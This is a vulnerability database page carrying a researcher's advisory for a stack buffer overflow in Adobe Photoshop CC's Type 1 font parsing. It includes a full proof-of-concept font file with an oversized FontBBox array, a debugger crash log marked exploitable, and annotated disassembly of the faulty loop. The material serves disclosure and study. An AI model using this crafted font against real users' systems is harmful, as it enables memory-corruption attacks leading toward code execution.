Vulners
Lucene search
SRC-2019-0060 : Adobe Photoshop CC Type 1 Font FontBBox array Stack Buffer Overflow Remote Code Execution Vulnerability
🗓️ 04 Apr 2019 00:00:00Reported by Steven Seeley (mr_me) of Source InciteType 
srcincite🔗 srcincite.io👁 35 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Adobe Photoshop CC 19.x < 19.1.9 / CC 20.x < 20.0.6 Multiple Vulnerabilities (APSB19-44) | 16 Aug 201900:00 | – | nessus |
| Adobe Photoshop CC 19.x < 19.1.9 / CC 20.x < 20.0.6 Multiple Vulnerabilities (macOS APSB19-44) | 16 Aug 201900:00 | – | nessus |
 | Adobe Photoshop CC Type Obfuscation Vulnerability (CNVD-2019-28666) | 15 Aug 201900:00 | – | cnvd |
 | CVE-2019-7973 | 26 Aug 201917:45 | – | cve |
 | CVE-2019-7973 | 26 Aug 201917:45 | – | cvelist |
 | CVE-2019-7973 | 26 Aug 201918:15 | – | nvd |
 | Adobe Photoshop CC Multiple Vulnerabilities (APSB19-44) - Windows | 14 Aug 201900:00 | – | openvas |
| Adobe Photoshop CC Multiple Vulnerabilities (APSB19-44) - Mac OS X | 14 Aug 201900:00 | – | openvas |
 | CVE-2019-7973 | 26 Aug 201918:15 | – | osv |
 | Type confusion | 26 Aug 201918:15 | – | prion |
10
%!PS-AdobeFont-1.1: CMMI10 1.100
%%CreationDate: 1996 Jul 23 07:53:57
% Copyright (C) 1997 American Mathematical Society. All Rights Reserved.
11 dict begin
/FontInfo 7 dict dup begin
/version (1.100) readonly def
/Notice (Copyright (C) 1997 American Mathematical Society. All Rights Reserved) readonly def
/FullName (CMMI10) readonly def
/FamilyName (Computer Modern) readonly def
/Weight (Medium) readonly def
/ItalicAngle -14.04 def
/isFixedPitch false def
end readonly def
/FontName /CMMI10 def
/PaintType 0 def
/FontType 1 def
/FontMatrix [0.001 0 0 0.001 0 0] readonly def
/Encoding 256 array
0 1 255 {1 index exch /.notdef put} for
dup 11 /alpha put
dup 12 /beta put
dup 13 /gamma put
dup 18 /theta put
dup 21 /lambda put
dup 22 /mu put
dup 25 /pi put
dup 26 /rho put
dup 30 /phi put
dup 58 /period put
dup 59 /comma put
dup 60 /less put
dup 62 /greater put
dup 64 /partialdiff put
dup 65 /A put
dup 67 /C put
dup 68 /D put
dup 70 /F put
dup 73 /I put
dup 77 /M put
dup 85 /U put
dup 86 /V put
dup 100 /d put
dup 101 /e put
dup 102 /f put
dup 103 /g put
dup 110 /n put
dup 112 /p put
dup 117 /u put
dup 118 /v put
dup 120 /x put
dup 121 /y put
dup 122 /z put
readonly def
/FontBBox{-32 -250 1048 750 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337}readonly def
/UniqueID 5087385 def
currentdict end
currentfile eexec
D9D66F633B846A97B686A97E45A3D0AA0529731C99A784CCBE85B4993B2EEBDE
3B12D472B7CF54651EF21185116A69AB1096ED4BAD2F646635E019B6417CC77B
532F85D811C70D1429A19A5307EF63EB5C5E02C89FC6C20F6D9D89E7D91FE470
B72BEFDA23F5DF76BE05AF4CE93137A219ED8A04A9D7D6FDF37E6B7FCDE0D90B
986423E5960A5D9FBB4C956556E8DF90CBFAEC476FA36FD9A5C8175C9AF513FE
D919C2DDD26BDC0D99398B9F4D03D5993DFC0930297866E1CD0A319B6B1FD958
9E394A533A081C36D456A09920001A3D2199583EB9B84B4DEE08E3D12939E321
990CD249827D9648574955F61BAAA11263A91B6C3D47A5190165B0C25ABF6D3E
6EC187E4B05182126BB0D0323D943170B795255260F9FD25F2248D04F45DFBFB
DEF7FF8B19BFEF637B210018AE02572B389B3F76282BEB29CC301905D388C721
59616893E774413F48DE0B408BC66DCE3FE17CB9F84D205839D58014D6A88823
D9320AE93AF96D97A02C4D5A2BB2B8C7925C4578003959C46E3CE1A2F0EAC4BF
8B9B325E46435BDE60BC54D72BC8ACB5C0A34413AC87045DC7B84646A324B808
6FD8E34217213E131C3B1510415CE45420688ED9C1D27890EC68BD7C1235FAF9
1DAB3A369DD2FC3BE5CF9655C7B7EDA7361D7E05E5831B6B8E2EEC542A7B38EE
03BE4BAC6079D038ACB3C7C916279764547C2D51976BABA94BA9866D79F13909
95AA39B0F03103A07CBDF441B8C5669F729020AF284B7FF52A29C6255FCAACF1
74109050FBA2602E72593FBCBFC26E726EE4AEF97B7632BC4F5F353B5C67FED2
3EA752A4A57B8F7FEFF1D7341D895F0A3A0BE1D8E3391970457A967EFF84F6D8
47750B1145B8CC5BD96EE7AA99DDC9E06939E383BDA41175233D58AD263EBF19
AFC0E2F840512D321166547B306C592B8A01E1FA2564B9A26DAC14256414E4C8
42616728D918C74D13C349F4186EC7B9708B86467425A6FDB3A396562F7EE4D8
40B43621744CF8A23A6E532649B66C2A0002DD04F8F39618E4F572819DD34837
B5A08E643FDCA1505AF6A1FA3DDFD1FA758013CAED8ACDDBBB334D664DFF5B53
95601766776D4F09024EFFA59E6176AFB1FCA154B3072BAD4FAD58611DC4B5FE
4721C679FD0C9063A7BF16271BA4CF88836178B315E214AF2E76F4ED9EBFB02F
B3C30D8F9F808B3F10D07C1C026C616BA3BAF6EA02CD9927FC4989F34D38C5CF
B92F377658A321DFA315C68F3C463DC43A121AE6697522A243577EA2458E7A3E
50AC38BB2E65435F1C3C311B913C770B51CAFDE0071F399D0959D114BCC91997
F5136F6EABB32E1A435FB41F6B66C0B2C43882130630853AB9DBAFA018613B1E
8E53108F13C412AE5FDF5AE811328D61E0C1C23D0444C22690AFF5A4AFA2B0E3
36346A889395C7EF5777D9C5D2C22725A7AF54C83E0DAAD2CFFD74BBA7DC3E97
B6796437DE4E5569DFFAA1C0606E1AA3F0566423EE321E796057C7158872F6DF
C7BD781403B42FC231A40A5809F20DF2D337D2AEC64782702CE4063FB4FE1CBF
F64C03A73EA8625C9128338FB33E1B34562A74C7E302498FA354ED12CDF0955A
502F41AB757B4702D56EC0997D6F98EF5443FE6602210ABAC3A9FCD64349A179
7D1ECB8E55BABC40E53772DB6E58D85885FAD1A1497A32D7D207CE19F798EA0E
EAD9F4EDCA1EC761B5A0D8760B8C4F3662261BC429928C8F88970DD32A557B8E
E49502689ED399250B6C012D4432BFA199FF2737DEE17AA1E32BD23E40887516
F9A848EDD36EC34B8522DFAD0996CCC9557839E16F06F345CD3575BFC8BC6BE6
6F5A1BF8CC94DEFD461EFCB02682BB95CC7ACE3FA52740F371D7EB9CA00A72F9
3DC5F5186517E36EBED8E26D9639265887276FC555C55D1855175888FEB29D0F
D54A05DCEBC8D1B423E0D983498F13851E6AC1A4AA0F374E2EBB0F671F1AA1A8
6A928816724CC9EB0A32F867D720BE7E0063B0CE205D51CF9916A36B9FEB3321
61EDD65520211F3DA17974A7DBB8FFBAAE6ED30516A985328837E5BCDADE6DD3
3966EFF786B5D0EF721D73501E3C7B575739C2A83863FEEA2763CFA8F21F42BB
8EF9075EA5902DF84DC019D818182AC0A5B1AEB6E575917953D22CC57D655142
63ED835BC8BFE7024C4DFDD441B7DD937AC1E884459F71436809079DF4FF6471
CD92BB75068ECE0379DFE2DA66A52CE74A875B1A3EBC3429E94C20F5C372809E
0751B3DA252B4BCEDD402F1EFC10C5C22C642F6C82C091D58A0F212BD1F6AC5A
544F5712FF4272B90C80F18003A83164F676D7248A5B11A8769BED8D8D535B8F
A3346942A4FECF593795F576329EC7DDF79E53FDC52AB909336957FB2B3DBB23
F605780047C55B0BE6A6F6F0A58670641CD809E23040EC8940E8CA6B309733F0
0D06CCDB2DF7F48CD902B7BE149E7C5F73081851BF8C1EFC945D4CCF5D7DD685
B98E9E4D6F16A9F74CE384A39A63B9EB386442FB18E1D39906579CE42B942189
060367EE51DF6342993E68B90F506A7037A2B548B25CE07AA0B2D3132F1EA0B0
E2BBF3DAA9F9D0A156C28C333C85392556A1B4679326938B12128D35134245F6
F271C1B858E17D0FEB0E99B659121B3CC0FA3A7FA1E6DFF4B4F5337D1CC84067
11EB01A0CDBA65913A507D1604C8482B949F4A71EA4735323254184367FB68B3
B9A3AC611C0B62C4C97A1007B70F3019F62F164D22C419540222E8D033C7F628
115B031F2E7EEF8AEBB7D520EF6D1C61CA2505E16B4855AEF44955E1A4617E92
0CB97633A6F7362E65A3C04BED154AF88E3A6D64960BC019B8F1FB107D7904A8
2FD80DA6F6A857391DC28231BC0EE4AFEED8170CDF8F9B4B77829205BD5CA122
58EB0FD25CC99CEB8BFE56A69FFD22362BDD2634B39FBD96901F1C123392272F
05FB33298D44B8E416A12BC5B53173048C32BFF6F29C3BDC4213988044A908C9
6B9A1ABA9C052C4DD57AB177C3F5692D438C73D292DF33BC87428F982ECF4DAA
5C6399FC9B62A48B6878425CE558BF2A302B91D26D213E8BA528C3452A7E1F06
643933DCAF5D4EB1429B229EF61BE9C76F1EBC051CA010E3A4FE26D1F855B022
F0285B91C35504FF12FF98E3DE08792274788B6993C1459A0164F6C31283B43A
B618055F526AF15C85FF493EDD36DF6B48AAEB2EDBF509580D147B4BB615814A
BB0A080890BF112C295C04D99EB9D3F257B2DC63023DAB01AC9437F2D6025ED4
84FEEC7AAD1D77E0D3CD6ECA6EDD92FF5C9EF7C7916F04688EEB42A4ED977F71
D590F50D7BF5A76AEBBD65DFD00A8FBEAFB269A76994E10F2FC09EB34E017040
2A56CDDDD39E7A9FDC5814ED74469C55B215B72824FD598221776781EC6E98EF
6511319BEF631C5E21343D9B44AA12A56B326FF62405C146B50C0D8C13CAE9E5
514E9192B048E2AD6E638A6BBA54407F2876E3A2EC9A37BE5A35309D8CCE9E47
272B140706E9BCA0C21F38BF77A5BD2B5BFB6FED766B87D311E86A9AA011ECF1
906C8745F3CC14C79453EB5E2BDDB347F3B1DFD0DFC3BAE0F71707933221F95D
9CFC22E71B8863B5F79487D0EA516FBDBD8B7AB8815D6B0928969610186DE799
020A0B1784AEF18E5203ED3C6BE2157FD93A4DFC703C5737F484B9E7E3264DFD
A7962CC849E0AA847866EDF8C4693C9FA53C7AB90C76EDB5988BE2AAE637D4B7
390E6FD502C5F89AEC3B7FAF59D986B336FD3751F2B29784D22D7C99190F913F
9263123EC9A3DE68B2993CAD3DAAC25B677A11D1C4491388DF0F41ADA0B57FA3
63486027C0F91487D827C28AEB37902CA7A823C0D8761F4E072DEECD0F6399EC
0F9E8CDA826915F3A874F90ED0317D89E083925949A7A8BA2A3DA3429F102192
0CCD7F04CCEF77E05ED8DEA13B1660D5B27341E54336F800E7D91EE3F6260556
6A89A00BC302C9F1DB453C2EECDBB83FF01B31590684C6AFEA1DB2303200DA22
3C5FF42DDB3909902F136E5B1FC36B1546EBE35F61B3ADF2942021B82422A816
BAF81FF8EBD36E930F46FEE018B66FE1DF68411DE51606DC9612D84445D99080
1C6EC632D71E8A7742F4C434BED02D039A144BBB85D96D994F224EBAFA3CB681
C9769B944B142C44B3523955393ECF3A76B432D9E6A7B724425D5CBB32C83219
A9BA3454C6EF6529A5D86DC2965DD2972F68DCA73891F5A7347CD9D60581415E
762FC3F51D7DD5E8FADCA307859F22099EBC2C0DDA7C72FF9FB047151B9A5230
5D883DC944B5CBB1B476FB9AE166B8D76B1CC0F4192594B552F5DDF187C70F68
19E8B302FB48A99F8782BEA0B72BCE2CEBDEDB0EEEB7C409E2439932E9D6B554
38D6A9FAB99F70064612C512B02FF9E3A40DEB6B5DF2B054A583E4F1BA085974
803F59927818E6D29465F5AF3D14396FE3C161523BB7992F70DC85E047425828
F099A652BC5598A5925568D96023F83A8190000F4D420FE25CFEABF008487F0E
55D6B4415ACFF920D810BAD4B4C0F4F2F5A5E83C7AE50A942FA0092F03301739
C5DA47D39B4D7E1FA16AC67D4C1231CE8159145397A129B2166BCE09E4307C25
3BD05756CFC9488F4EBADA907C66FE06820BD36ED8FA50EBE291C40630B28F37
9EC9001E847C48F4EAC0B5364EC61863CCA30B9BF541AF3844F44F24E9B5A91F
D459BC9E61EBFE040F29263E81D25ECEDF9992C58B008F8596F777B95E326C9D
4391F49F0BB65A8077950A2A0EB59C73BB183C056458642158514EF13EA65B82
2BC164ABE1966AEB3014F76C7F25D1E312D614B3F6357E6D956304E1DC5121FE
97B99E88483CF579916DAD9BFCFC12090F23C1CC67BC61529E097995435F43EA
94E1D5753E8D33946148D9A966356A89550439F8E15AC75AFA8BBDA4810BF57A
7B98CB8DF0DBADB5E7C014E3F65F3C8DA035E7CC10CFBA4A6885ED72EEA5D298
11D25FB508997A4CFF88CFD15A958D93AFE2C59FDB2B35F45B08D9AA58B56412
571789F2F8D428727F1A68169387A331236C059FA778EBF87D54C97DBA99EAF1
E676A60FF189E43AD665653DA394032EF4833DC62A3BFC4B617A01E06B204440
E16942FEB1299D4B7CA68DF0DF6612256A1EFE17875D2568F19F0490BC92904A
EE6B6D0F3B8D8854BFC42AAC19FFE981E6F2518718A32242A0011CD1F7BB99F2
06A895181987934B7E25A53E509E2AF034C7389DF733C2F011623E1D797AE264
AC0DC7A6DA91876F5019FD9650EA3DE1FC9DEF4285E535EE9310355450F7E465
2967CCDCCEB70F5CF237275FE7B509F208024937F61B2985F7E1C24F34FA540B
55B7237CE79AF6B90E1C481D4D8639AF514C945F40572E70BC88E07552857807
7C91CFFED2C4D4EE5C054A8C9E35AF6216AC7F127B5A4C4B871BF27F06166820
37D4972502DCC662FD5D98037B3251ED782C9448AA3B2AF8099541B927B35401
E3A2D1D12336C049784A3F1F30169FE473E4F2D5E03124D6F13E4E06367D2FC9
5FE9886A0C9DE7655AD9AC2F2B8F43002FD2B41A8D8FA2D7B8AAF2BD6E54AE94
C6D24CFDBA23AB82A9905F80CEE259EB52A3F62026E862D35C1939190427CC6B
FE92985C53273501683BB0B2AB312FF4BF42E7D7304F45DBABC19B5BFC73BF6C
E4EE7408CF574EC875279D9BBC0B4ED8B7A495C28D5AE530C0C76E9AA4F9B8E3
234DCC414B97213A63CA6293E3E3F9864EDEE04A2DA00A6628A41480DE82AE8B
22AF0C4E442B07D7B9BFBC5ED574C86DC774C9D21D9A54F2AD2231F62E35ACCD
5B564AFB52EBFF773124311B4F83A487199BB74D2F8F22A9D8E4FAD5C0E4D0C3
953CF05C519AF3A50F8F85B2B17BEE0EA8B6D068B37B0C5DA517440E55FE08E2
B16B18D5CBD86B7FB4F208F8B7420AB30502B15EBCCF5CFA4E6F01CB062FB817
1198F19F80FF084A48A9A946E20C415F73F20DB21A71902536BCDE24D0CBAD77
16D9B3C24492FB516A77BC1D55DECD497EBC1439BE4A5A38A9D9925571233213
B5632D52756153D6777282A3303BC9776BBEF1A9F36FC184057531102E18BE77
9B524ECC856DCC6B4C15857B1108C06C5B82D1490096C1E87EEF58B9F4A2BD93
5EDB3BCB50A429F05AFFC4E0EFFF5B15058E1B8CA0C9B7D2EB8F2767234A7DD8
B527E2947B942017897E7A42053DBE4473532F57D1510DDEB688CCB9AF2F12EA
107C309E5C9A73E2C4C35193A5DC3268B80374CE36B9157DA49AFA73CE80673D
6DCFB540F6827C1E7105B4BD29C431FA781DDBF43FE7A6F1AD554B0ACE1F6DC4
37779B83CC8A7E921AFC2D9064B50375A59F8DA19DCAFC1E70E2BCF4E81D58BF
116657D199174B411D88FE6A41A9A9ED1AA6FAB9591F74F69DA6447A076E887F
8955F24164C30A897993682B067DF80BAC33D71C80A600893CA17149578DB558
83A7697357FAE2B131E094576638C8B9CDAA0A7E7842F07B23D8034940491005
D38F29443FFF0D9207A33B52AB5F520B543EFBAED92E8C1B59D04F3323EA4130
3F40CBE99A5CC7EF434408926D652EDD716CFF362D3F2156761154C2C39F515D
F26C1B55A58664026B71A4D66465189815CDA838D6147047096BC39DD5BAA3F8
5176DEE7C21742A862554DFDDFA1DF580D7E8C6DFAC12AF5800CB3706C75D303
61A000D1711E940897170248272903CF558A3B9EED332688E5D8EF3C9EFA3B3F
905AD4B17DA41C12FE946FAD2AA9A86A77D23CFE6803ABA70C3930D04E8F85BD
D3D579205094FECC8CD28914073DF874017E59320F25E4719F0E7511F893FF38
7CE056055CD3DA069BA13E0674A4DFD17ABDB2544B306DE54E4FA0CDE5691385
4F727AD76B04096D71B65B9E0FF6224B4C8AF185D040409A0DFF89FE13A5594E
CCC593A8689D874199F669DA127BBF70DBE4424B94C810F843773BE522EBE845
7558E59ACAFF17F1168D14339C6C9CA399251ACD0AB723A38DDCD69B01477004
BBBA575044CCBA1477D9DF8E0EC834C0E2882D7138A7ADCF73C2AD284037716B
F31144CB8FAA4E33B822B903051BA236705926A7038E9E1EBDD5E21D5CFCAB54
A83CC6764ACC0AD8496171E05DD0A5896B73576071613F883A995991FEDABCB2
2ABCB59DAB634426AC405C045A28893547039989419BCE2EA708BFAA12697950
8F39C032BFCCDDD98AFFE165E46C86BA87898118F2119EA64CC87FED3E796784
B12A11F54EC6ADD7C51A2C92EEB0FD26AC7281C9175A92CF75BB6A8DA3EAE9B1
49818CE6136319718B88EEA0B7806767E93C19781F9A9DF64C8E81AAE85CDB76
FB5495BED3AC88DDFA16859A40CE8CA8DEA4493648D34A1350CE9086CA5A2A7C
0AF66A6876D67D465F16DAA74D241B80384C18611AE0CBF6041412DA0BA41AAA
CB9C2ED3FB0F085A0624BC0EC6D85CDCD0001BE6C617742592648D22905387E0
C167E293199E781E7E09D39C30D2DDA89A80E016E2BDAFB4EDB25044E8B7F0E6
A1F3F063C9D00843F00263A6711349A4D99D8D75DC852C76ADFF27E2E40643AA
F92BB033FC966C7359C2514C10E287EEBA8916C35F363008F8C1363AE7D7802E
7AF2E4D8E957C81839A368F93D336595DD2DEB11D546F042E8C21F0605B7545A
CE368069FB9726D1F977AB2ECF4BA189CEA5F1293CA87CC565CEC82923D30AE1
5B38E1921B2AF3106E586AA9605A1EB85224EEC3247F9B65AE7B9610197B0103
844F1E75E340963974F2EDEA1C1478483E8FE221D2DAD0F881BA6B4E8AEC083E
CA2CAA72767BB6A32FE8E209DECB743510677954945A79D458B921786CAA6FBB
AA1122145FE19A650D8064D5560C8AA267F6E285638AC2B345B074B4A68FC935
7BCF6DB898249A703323CF4D1D18D0B01ABF64FF8A562BDE28A9B65D70297EA2
38ED03F1E6EFC7F87AEDEB09B329BFC093390A840DF50E6CCE0EA6D124919B16
6BFF042944CC8040045EE709292CE98C591D71603FF263FBBAF408488F5A734A
A01218D8936863745FED46C5285B25D7306E52029464FFCFF9502AE8E6248A8B
6F8CDAD5FCD5C961890E2350176B00E1E34F42C136D6F2CF1F69F2A79AC5B630
18A61F259FA7689DD0E32DD6415E70D5728192015F94DCDDE14F859BBC120543
DC625507D3F2098275D87C431312C437EA611D822AF090E647FC1AA949A150F3
6FBEC872DCB2756AAA2D5791B3FCEE1E52D2E8D177C3E69BD6E55F1FC285B1E9
319D48B687AD658DCA06D6CA16F7D192A6E89EF4CC741550187C5B1360C5917F
E993D4A32F299F49C0FDE38E518C2D93AC970D40165F29F6A42AC3AEEBDDA6CA
DD860CED28678B01DBFEBBA7532935779C9CAADA665239134CB421D16F4D24B1
486E4F4946CCE1FB5D8994ECB3F2FB853D427D7979F2D1D6CA1653B6EBE32064
AC12A858EDA4036B843B1C79B300AB5B6560E8E838ACE3F49240918035F2FE1E
62A233DD1B911F1C7D551AF5257A21BF66885417A2BFD24B06B9601303BFAA3B
7281F95C8B40B67FB77626A4EA87248551F3E2B001CDE9BFBEFCC730E1E18D48
43532F155E276BF9A7CA8407F5FF84A264FDFA49DB9D495BAA53CC65F765CAE0
8ED159C596B94077ABC413DA4472398DE11B17129811CCAC2BA48668F64A0243
E17A9D0812A4BD5E38DF12BFA2838E66A17FB87F20D46CC17C562F8DC1023C5B
714D85277B4D9FFB71EC008CC41A16A098DDE8F9DCDADDF14A3F4DAD8657B7A9
201846536E41B9934FC8633A65A849B820FB2E51EE1CD6F53A50E0023139D987
809C492E5BD3B3879B8A7543F1C4CA7972B88E45EB94BF8085E0C0CB5EA1D204
61DA73DACFDE4CC741119564936D651D0A0B790078C4B229F776C0CBF217CC7B
08C18E399DDD846773CB5B9F7A1F39DF6EF5B83D85718F162B577D4279E05856
0774CEF8E47C5EA77AC016939330FA1A51E1E2E100A9665A1DDE8410DD413745
0F5244B940250B61830480E8F563FBAA6E4CB2DEFC82162B1A8C09A5D3F470AF
959558B7B075E951332B53A2069070880EC3040DE22159F9B6F48355C1B2D270
CFA741C46C218D62C04D54519224A485742979F50BD45011E05F04E2F594CBED
1B0D411A7D2587870C6FDCF7AE4D1E408BF6B66D6B826A427BECBEF55D82DDDD
50FFF1C1962D6F2D81FB050B60CC6AA74B7292A16426CBB565615BF60A881A9C
9DB9A8FFD937F8B0EFCB0F992927FC59B78B45C545CADE2A54791E3DBA3E9F0D
B6BF14499D4C0C758CBC09037AD3828689404005FA2DD419343EA6EC91128B61
4C5DA0B792FDCC0B248D5853BE2E1EB9A51418E32119B35332A3A714A13A2E3A
390B24D212B070338F3F0F240E5F8864242741EAB379B90966DE283524DE1D4E
91F6FA3128AE5485837F8949CEBE18A51CE9AB4479B98D226A735EAF763E7FE2
732205EACFAB5DC84E57D6788178A88ECB99D69520FA5271B04B5C8497FD3992
B207D771E7BF8E3AECCAE0C723162344AFB005B4EAB4E92A9ADDA0A7542FAE67
09E022138177A1229FD4B62B987CE1E70DD0F904DF6A46FC4C09A703B873507E
C931B366EDC69DA8401AF65333F2168458CE140303DC56E25F5B516C64798977
FEC0CC3F07CD63AF3C46156C30A1D36FEF6CFBC31FFC4B49016DCE533F925D3D
50AB23AA654B70139D87BFDAF13B810D4EA6AFCC857259D25C8B4A3C02B57380
2BEEFAA6C1856F93BE103A2097591F5E19552ADA91C34C7BF4772935995252A2
2E0D6A6BA227BA050ECB30AE857DD6DA3963D2E10E5873FB5E8D9A9FFD642621
3BBAB4058D700FE50E4B012C9AD470EF0198CFDCFCC6191EEC3C26E97B901E2D
1CA5B455D0EE03F7E09735D5947528D3AE28063734D399ADB94D42532E906D7A
7E23EDB3B94A88D595209CA6EE0ECD896A1F23FB7EC5EA1E2B44874A9E6CC09D
5FDDE84B57A5F26893A11D5A56567F5589711D12FBBD0FDABC04AFBE382F24AF
094B1ADB336FCC8F6D6BE86E8A03CF4351C57AA513382FA1BA91A24E55F2CC16
97AF3CFD1EFBD4E111090D1FF0E4270F7182BD191D289C53783F05156FE4ACEC
9C7E9D4467ED6852E4D897AC05AA2FAA72ED0BB01DF92E9257BAEAC5E19F80EC
C24783BE097FC3A9B36D87806B5E9F304622FFC6A7F9B553381EEA0607AAFFCF
1322085B99B8D899A0176557103EDF0BBB5368470680E73132E13F8ABB509F2B
EBA0C0F7F10774225FC75D1B2874F9330C204EDEC05240519C6F71C871C6535D
6CF8A3B3F785961747130EFA5711B59BE7F459CA09870794DE44D32E1305591E
EAC44E3BF81642ADDE6B866A3B8E90B067BB2B45F85AFF8F9211CC300F2DFCF0
B973741EEA854E
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
cleartomark
/CMMI10 findfont
12 scalefont
setfont
newpath
50 700 moveto
(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%%^&*()_-+=) show
showpage
% Adobe Photoshop CC Type 1 Font FontBBox array Stack Buffer Overflow Remote Code Execution Vulnerability
% Summary:
% ========
% A specially crafted postscript type 1 font file can trigger a stack buffer overflow via a crafted FontBBox array.
% Analysis:
% =========
% A large FontBBox array can overflow a stack var and lead to a stack based buffer overflow. In this example, I supplied a poc with the following:
% /FontBBox{-32 -250 1048 750 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337 1337}readonly def
% Debugging:
% ==========
% STATUS_STACK_BUFFER_OVERRUN encountered
% (133c.850): Break instruction exception - code 80000003 (first chance)
% *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Adobe Photoshop CC 2018 (32 Bit)\MPS.dll -
% eax=00000000 ebx=503aad2c ecx=77a2e4d0 edx=002abf0d esi=00000000 edi=002ac8cc
% eip=77a2e34d esp=002ac154 ebp=002ac1d0 iopl=0 nv up ei pl zr na pe nc
% cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
% kernel32!UnhandledExceptionFilter+0x5f:
% 77a2e34d cc int 3
% 0:000> kv
% # ChildEBP RetAddr Args to Child
% 00 002ac1d0 50126724 503aad2c 002ac50c 5012682f kernel32!UnhandledExceptionFilter+0x5f (FPO: [Non-Fpo])
% WARNING: Stack unwind information not available. Following frames may be wrong.
% 01 002ac1dc 5012682f 503aad2c 00000012 002ac224 MPS!MPSToAGMColorSpace+0x12274
% 02 002ac50c 502556ef 001b2493 45a2b7ec c2000000 MPS!MPSToAGMColorSpace+0x1237f
% 03 002ac594 5012a452 00000001 01002092 459948bc MPS!MPSCT5NewServer+0x7957f
% 04 002ac5e4 5012a6de 002ac720 00000000 002ac8cc MPS!MPSToAGMColorSpace+0x15fa2
% 05 002ac614 5012774a 00000001 00000009 00000000 MPS!MPSToAGMColorSpace+0x1622e
% 06 002ac64c 50352b4a 00000000 00000002 00000000 MPS!MPSToAGMColorSpace+0x1329a
% 07 002ac680 50352855 00000003 00000002 00000002 MPS!MPSCT5NewServer+0x1769da
% 08 002ac694 503532cf 45a0cc24 0000000c 00000000 MPS!MPSCT5NewServer+0x1766e5
% 09 002ac708 503537a2 45a0cc24 00000010 00000010 MPS!MPSCT5NewServer+0x17715f
% 0a 00000000 00000000 00000000 00000000 00000000 MPS!MPSCT5NewServer+0x177632
% 0:000> !load msec
% 0:000> !exploitable
% !exploitable 1.6.0.0
% Exploitability Classification: EXPLOITABLE
% Recommended Bug Title: Exploitable - Stack Buffer Overrun (/GS Exception) starting at MPS!MPSCT5NewServer+0x000000000007957f (Hash=0xe6ea5d40.0x979b8c29)
% An overrun of a protected stack buffer has been detected. This is considered exploitable, and must be fixed.
% Static Analysis:
% ================
% Since the stack var comes from sub_10165500, I'm marking the bug to be in this function.
% .text:10165500 sub_10165500 proc near ; CODE XREF: sub_1012DE70+396
% .text:10165500 ; sub_1012F0D0+1FC
% .text:10165500
% .text:10165500 var_1C = byte ptr -1Ch
% .text:10165500 var_14 = dword ptr -14h
% .text:10165500 var_10 = dword ptr -10h
% .text:10165500 var_C = dword ptr -0Ch
% .text:10165500 var_8 = dword ptr -8
% .text:10165500 var_4 = dword ptr -4
% .text:10165500 arg_0 = dword ptr 8
% .text:10165500 arg_4 = dword ptr 0Ch
% .text:10165500 arg_8 = dword ptr 10h
% .text:10165500
% .text:10165500 push ebp
% .text:10165501 mov ebp, esp
% .text:10165503 sub esp, 1Ch
% .text:10165506 mov eax, ___security_cookie
% .text:1016550B xor eax, ebp
% .text:1016550D mov [ebp+var_4], eax
% .text:10165510 mov ecx, [ebp+arg_8]
% .text:10165513 mov edx, [ebp+arg_0]
% .text:10165516 push ebx
% .text:10165517 push edi
% .text:10165518 mov edi, [ebp+arg_4]
% .text:1016551B test ecx, ecx
% .text:1016551D jnz loc_10165621
% .text:10165523 lea eax, [ebp+var_1C]
% .text:10165526 push eax
% .text:10165527 mov eax, dword_10351CA8
% .text:1016552C add eax, 670h
% .text:10165531 push eax
% .text:10165532 push edx
% .text:10165533 call sub_1021BA70
% .text:10165538 add esp, 0Ch
% .text:1016553B test eax, eax
% .text:1016553D jz loc_101655F9
% .text:10165543 push esi
% .text:10165544 lea eax, [ebp+var_14]
% .text:10165547 push eax
% .text:10165548 lea eax, [ebp+var_1C]
% .text:1016554B push eax ; size 0x10 (4 elements expected)
% .text:1016554C call sub_1010DD40 ; stack overflow
% In sub_1010DD40, we see the following code:
% .text:1010DD80 loc_1010DD80: ; CODE XREF: sub_1010DD40+76
% .text:1010DD80 lea eax, [ebp+var_10]
% .text:1010DD83 push eax
% .text:1010DD84 lea eax, [ebp+var_8]
% .text:1010DD87 push eax
% .text:1010DD88 call sub_10260BD0
% .text:1010DD8D mov eax, [ebp+var_10]
% .text:1010DD90 add esp, 8
% .text:1010DD93 and al, 0F0h
% .text:1010DD95 cmp al, 10h
% .text:1010DD97 jnz short loc_1010DDA3
% .text:1010DD99 movd xmm0, [ebp+var_C]
% .text:1010DD9E cvtdq2ps xmm0, xmm0
% .text:1010DDA1 jmp short loc_1010DDA8
% .text:1010DDA3 ; ---------------------------------------------------------------------------
% .text:1010DDA3
% .text:1010DDA3 loc_1010DDA3: ; CODE XREF: sub_1010DD40+57
% .text:1010DDA3 movss xmm0, [ebp+var_C]
% .text:1010DDA8
% .text:1010DDA8 loc_1010DDA8: ; CODE XREF: sub_1010DD40+61
% .text:1010DDA8 mov eax, [ebp+arg_4]
% .text:1010DDAB inc esi
% .text:1010DDAC movss dword ptr [eax+edi*4], xmm0 ; stack overflow right here
% .text:1010DDB1 movzx edi, si ; edi is the counter
% .text:1010DDB4 cmp edi, ebx ; ebx is the # of elements in the array
% .text:1010DDB6 jb short loc_1010DD80 ; jump back into loopData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Aug 2019 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 39.8
CVSS 210
EPSS0.27473